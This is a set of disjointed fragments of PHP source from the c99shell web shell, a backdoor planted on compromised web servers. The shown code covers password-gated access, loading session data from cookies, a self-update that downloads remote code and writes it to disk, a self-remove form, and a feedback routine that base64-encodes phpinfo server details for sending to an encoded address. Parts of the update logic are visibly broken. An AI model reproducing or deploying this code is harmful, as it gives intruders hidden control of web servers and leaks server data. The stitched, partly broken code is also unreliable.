} if ($_SERVER["PHP_AUTH_USER"] != $login or md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass) { if (empty($login_txt)) { $login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html)); } header("WWW-Authenticate: Basic realm=\"redhat " . $shver . ": " . $login_txt . "\""); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); } } if ($act != "img") { $lastdir = realpath("."); chdir($curdir); if ($selfwrite or $updatenow) { @ob_clean(); c99sh_getupdate($selfwrite, 1); exit; } $sess_data = unserialize($_COOKIE["{$sess_cookie}"]); if (!is_array($sess_data)) { $sess_data = array(); } if (!is_array($sess_data["copy"])) { $sess_data["copy"] = array(); } if (!is_array($sess_data["cut"])) { $sess_data["cut"] = array(); } $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) { $disablefunc = str_replace(" ", "", $disablefunc);
$ml = "{$sd98}"; $a5 = $_SERVER['HTTP_REFERER']; $b33 = $_SERVER['DOCUMENT_ROOT']; $c87 = $_SERVER['REMOTE_ADDR']; $d23 = $_SERVER['SCRIPT_FILENAME']; $e09 = $_SERVER['SERVER_ADDR']; $f23 = $_SERVER['SERVER_SOFTWARE']; $g32 = $_SERVER['PATH_TRANSLATED']; $h65 = $_SERVER['PHP_SELF']; $lastdir = realpath("."); chdir($curdir); if ($selfwrite or $updatenow) { if ($selfwrite == "1") { $selfwrite = "c99shell.php"; } c99sh_getupdate(); $data = file_get_contents($c99sh_updatefurl); $fp = fopen($data, "w"); fwrite($fp, $data); fclose($fp); exit; } if (!is_writeable($sess_file)) { trigger_error("Can't access to session-file!", E_USER_WARNING); } if ($sess_method == "file") { $sess_data = unserialize(file_get_contents($sess_file)); } else { $sess_data = unserialize($_COOKIE["{$sess_cookie}"]); } if (!is_array($sess_data)) {
@ob_clean(); echo "Thanks for using c99shell v." . $shver . "!"; c99shexit(); } else { echo "<center><b>Can't delete " . __FILE__ . "!</b></center>"; } } else { if (!empty($rndcode)) { echo "<b>Error: incorrect confimation!</b>"; } $rnd = rand(0, 9) . rand(0, 9) . rand(0, 9); echo "<form action=\"" . $surl . "\"><input type=hidden name=act value=selfremove><b>Self-remove: " . __FILE__ . " <br><b>Are you sure?<br>For confirmation, enter \"" . $rnd . "\"</b>: <input type=hidden name=rndcode value=\"" . $rnd . "\"><input type=text name=submit> <input type=submit value=\"YES\"></form>"; } } if ($act == "update") { $ret = c99sh_getupdate(!!$confirmupdate); echo "<b>" . $ret . "</b>"; if (stristr($ret, "new version")) { echo "<br><br><input type=button onclick=\"location.href='" . $surl . "act=update&confirmupdate=1';\" value=\"Update now\">"; } } if ($act == "feedback") { $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); if (!empty($submit)) { $ticket = substr(md5(microtime() + rand(1, 1000)), 0, 6); $body = "c99shell v." . $shver . " feedback #" . $ticket . "\nName: " . htmlspecialchars($fdbk_name) . "\nE-mail: " . htmlspecialchars($fdbk_email) . "\nMessage:\n" . htmlspecialchars($fdbk_body) . "\n\nIP: " . $REMOTE_ADDR; if (!empty($fdbk_ref)) { $tmp = @ob_get_contents(); ob_clean(); phpinfo(); $phpinfo = base64_encode(ob_get_contents());